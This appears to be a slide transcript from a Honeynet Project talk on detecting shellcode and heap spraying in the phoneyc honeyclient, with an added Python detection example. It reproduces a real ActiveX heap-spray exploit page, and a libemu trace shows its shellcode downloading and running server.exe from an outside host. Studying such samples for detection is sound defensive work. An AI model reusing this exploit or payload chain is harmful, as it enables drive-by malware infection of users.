shellcode and heapspray detection in phoneyc
TRANSCRIPT
phoneyc with libemu
Z. Chen
phoneyc
WB Malware
Libemu
Tracing JS
Basic Principles
SCDetection
Basic Idea
Details
Source Files
Implementation
HS Detection
CurrentResults
JoYAN
Shellcode and heapspray detection in phoneyc
Zhijie Chen (Honeynet Project Chinese Chapter)
Honeynet Project on Google Summer of Code, 2009
Contents
1 Introduction to phoneyc
2 A Typical Web-Based Malware
3 Shellcode detection using Libemu
4 Tracing Mozilla Spidermonkey
  Basic Principles of Spidermonkey
5 Shellcode Detection in phoneyc
  Basic Idea
  Details
  Related Source files
  Implementation
6 Heapspray Detection
7 Current Results
Introduction to phoneyc
http://code.google.com/p/phoneyc/
A Python honeyclient
Originally written by Jose Nazario.
Its purpose: to detect web-based malware.
A Typical Heapspray Mal-javascript I
<body><script>window.onerror=function(){return true;}</script>
<object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" style='display:none' id='target'></object>
<SCRIPT language="javascript">
var shellcode = unescape("%u9090"+"%u9090"+...(shellcode)"%u7468%u7074%u2f3a%u312f%u3176%u6e2e%u6d61%u2f65%u6573%u7672%u7265%u652e%u6578%u0000");
</script>
<SCRIPT language="javascript">
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
A Typical Heapspray Mal-javascript II
memory = new Array();
for (x=0; x<100; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 1024) buffer+="\x05";
var ok="1111";
target.Register(ok,buffer);
</script>
</body>
Heap Status After Heapspray
[ More than ??MB of 0x90 (NOP)s or some other x86 instructions as a sledge ][ Shellcode ]
Detecting Shellcode/Heapspray
SC/HS Detecting Tool: How To Detect It?
Introduction to libemu
From its official site:
libemu is a small library written in C offering basic x86 emulation and shellcode detection using GetPC heuristics. Using libemu one can:
detect shellcodes
execute the shellcodes
profile shellcode behaviour
Using libemu to detect shellcode and heapspray in web-based malware: see "Defending browsers against drive-by downloads: Mitigating heap-spraying code injection attacks".
Detecting x86 Instructions
SC/HS Detecting Time: When To Detect It?
Introduction to spidermonkey
What is SpiderMonkey?
SpiderMonkey is the code-name for Mozilla's C implementation of JavaScript. (http://www.mozilla.org/js/spidermonkey/)
Basic Principles of Spidermonkey
All JavaScript sources are compiled into JS bytecodes.
An interpreter walks the bytecodes and performs a simple action for each one.
All JavaScript variables are stored as jsval.
Some of the values, such as strings, are stored as an "atom".
Basic Idea
Both the shellcode manipulation and the spraying of the fillblock involve assignments. So if we can interrupt SpiderMonkey at the interpretation of the bytecodes that implement an assignment and check their arguments and values for shellcode, the shellcode is detected immediately at the moment it is assigned.
Details I
The following JS code:
function a(){b="c"; var a = 0;}
is compiled into bytecodes like:
00000: bindname "b"
00003: string "c"
00006: setname "b"
00009: pop
00010: zero
00011: setvar 0
00014: pop
00015: stop
So, if we examine the arguments of the set* opcodes on the top of the stack at runtime, shellcode won't get past us!
Details
To do so, we need to:
Step-trace the SpiderMonkey runtime.
Stop at the key bytecodes (such as setname, setvar, setprop, setarg etc.) of all kinds of assignments. Unfortunately, each kind of assignment has its own bytecode.
But all the opcodes related to assignments share a JOF_SET bit in their opcode description structure (./src/jsopcode.h), so that bit is the one thing to test for.
Related Source files to be used later
jsapi.h: Basic APIs for JavaScript execution.
jsdbgapi.h: Basic APIs for debugging SpiderMonkey.
jsopcode.tbl: All the JS opcodes (bytecodes).
jsinterp.c: You can find how each bytecode is interpreted here.
Implementation
Register a trace handler into SpiderMonkey using JS_SetInterrupt. This handler is called at each step of the bytecode execution.
In the handler:
Use JS_GetTrapOpcode to get the current opcode (bytecode).
Use JS_FrameIterator to get the current runtime stack.
Check the r-value of the set* bytecodes on the top of the stack with libemu.
Dump the shellcode and alert.
Continue the execution.
Provide this traced JS virtual machine as a Python module named honeyjs, so the other parts of phoneyc can use this module just like python-spidermonkey, with optional awareness of the extra shellcode/heapspray detection APIs.
Basic Idea
Heapspray
A myriad of NOP-like x86 instructions
Accumulating through a loop of assignments
Shellcode at the end of each sledge
Detection
Now: a variable counter to record the mal-assignments (assignments containing shellcode in the r-value).
In the future: entropy? The Nozzle way?
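The assignment-trap idea from the Shellcode Detection section and the mal-assignment counter above, worked through in Python as an added example (not code from phoneyc or honeyjs). It re-creates the spray loops of the sample page, decodes each %u-escaped r-value into the UTF-16LE bytes a SpiderMonkey string occupies in memory, and counts which assignment targets keep receiving shellcode-like buffers; the NOP-sled check is a stand-in for libemu, the `AssignmentTracer` and `run_sprayer` names are mine, and the shellcode string is a constructed placeholder.

```python
import re
from collections import Counter
_ESC = re.compile(r'%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})')

def js_unescape(s):
    """Mimic JavaScript unescape(): %uXXXX -> one 16-bit code unit, %XX -> one unit."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

def js_string_bytes(s):
    """Memory layout of a SpiderMonkey string (UTF-16LE). This is what a trap
    handler hands to libemu when it inspects a set* r-value; surrogatepass keeps
    lone surrogates, which %uXXXX-encoded shellcode routinely contains."""
    return s.encode('utf-16-le', 'surrogatepass')

def looks_like_shellcode(buf, min_sled=16):
    """Stand-in for libemu (assumption, not libemu's GetPC heuristics): a run of
    at least min_sled NOP (0x90) bytes counts as a sledge/shellcode candidate."""
    return b'\x90' * min_sled in buf

class AssignmentTracer:
    """Models the interrupt handler: every assignment r-value is checked, and hits
    are counted per target, which is the 'mal-assignment counter' for heapspray."""
    def __init__(self, spray_threshold=100):
        self.hits = Counter()
        self.spray_threshold = spray_threshold

    def assign(self, name, value):
        if isinstance(value, str) and looks_like_shellcode(js_string_bytes(value)):
            self.hits[name] += 1
        return value

    def heapspray_suspects(self):
        return [n for n, c in self.hits.items() if c >= self.spray_threshold]

def run_sprayer(tracer, spray_count=100):
    """Constructed Python re-creation of the sample's spray loops; every assignment
    passes through the tracer the way the instrumented interpreter sees it."""
    # Constructed stand-in for the sample's shellcode: a NOP sled plus filler words.
    shellcode = tracer.assign("shellcode", js_unescape("%u9090" * 8 + "%u4141%u4242"))
    bigblock = tracer.assign("bigblock", js_unescape("%u9090%u9090"))
    slackspace = 20 + len(shellcode)                      # headersize = 20
    while len(bigblock) < slackspace:
        bigblock = tracer.assign("bigblock", bigblock + bigblock)
    fillblock = tracer.assign("fillblock", bigblock[:slackspace])
    block = tracer.assign("block", bigblock[:len(bigblock) - slackspace])
    while len(block) + slackspace < 0x40000:
        block = tracer.assign("block", block + block + fillblock)
    memory = [tracer.assign("memory[x]", block + shellcode) for _ in range(spray_count)]
    return sum(tracer.hits.values())
```

The single shellcode assignment and the block-building loops each trip the check a handful of times, while the memory[x] loop trips it once per iteration, which is why only that target crosses the spray threshold.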
A Run on ssreader_0day.html
joyan@Jdeb:~/code/phoneyc$ sh go.sh
HONEYCLIENT MODULE TEST
fetching http://172.31.25.227/phoneyc/ssreader_0day.html
[]
==> http://172.31.25.227/phoneyc/ssreader_0day.html
JS EVAL
Executing Javascript:
DEBUG: !!!SC DETECTED at 141847268=141847572 size:374
DEBUG: !!!SC DETECTED at 141847524=141847756 size:32728
DEBUG: !!!SC DETECTED at 141723488=141847756 size:32728
DEBUG: !!!SC DETECTED at 141723488=141847756 size:32728
...
DEBUG: !!!SC DETECTED at 141723488=141847756 size:32728
SSReader Pdg2 Register method overflow
[ALERT] 0: 141847268 -> Shellcode Detected HIT: 1
Runing shellcode... offset:248
DEBUG: Begin analyzing ...
DEBUG: download http://1v1.name/server.exe -> c:\WINDOWS\system32\a.exe
...
URLs:['http://1v1.name/server.exe', 'http://1v1.name/server.exe']
Done
[ALERT] 0: 141847524 -> Shellcode Detected HIT: 1
[ALERT] 0: 141723488 -> Shellcode & Potential heapspray sledge HIT:100
VBS EVAL
IFRAMES []
HREFS []
FRAMES []
IMAGES []
Analysis of The Shellcode using libemu
FARPROC WINAPI GetProcAddress (
    HMODULE hModule = 0x7c800000 => none;
    LPCSTR lpProcName = 0x0041710c => = "GetSystemDirectoryA";
) = 0x7c814eea;
FARPROC WINAPI GetProcAddress (
    HMODULE hModule = 0x7c800000 => none;
    LPCSTR lpProcName = 0x00417120 => = "WinExec";
) = 0x7c86136d;
FARPROC WINAPI GetProcAddress (
    HMODULE hModule = 0x7c800000 => none;
    LPCSTR lpProcName = 0x00417128 => = "ExitThread";
) = 0x7c80c058;
FARPROC WINAPI GetProcAddress (
    HMODULE hModule = 0x7c800000 => none;
    LPCSTR lpProcName = 0x00417133 => = "LoadLibraryA";
) = 0x7c801d77;
HMODULE LoadLibraryA (
    LPCTSTR lpFileName = 0x00417140 => = "urlmon";
) = 0x7df20000;
FARPROC WINAPI GetProcAddress (
    HMODULE hModule = 0x7df20000 => none;
    LPCSTR lpProcName = 0x00417147 => = "URLDownloadToFileA";
) = 0x7df7b0bb;
UINT GetSystemDirectory (
    LPTSTR lpBuffer = 0x0012fe5f => none;
    UINT uSize = 32;
) = 19;
HRESULT URLDownloadToFile (
    LPUNKNOWN pCaller = 0x00000000 => none;
    LPCTSTR szURL = 0x0041715a => = "http://1v1.name/server.exe";
    LPCTSTR szFileName = 0x0012fe5f => = "c:\WINDOWS\system32\a.exe";
    DWORD dwReserved = 0;
    LPBINDSTATUSCALLBACK lpfnCB = 0;
) = 0;
UINT WINAPI WinExec (
    LPCSTR lpCmdLine = 0x0012fe58 => = "cmd /c c:\WINDOWS\system32\a.exe";
    UINT uCmdShow = 0;
) = 32;
Thank you!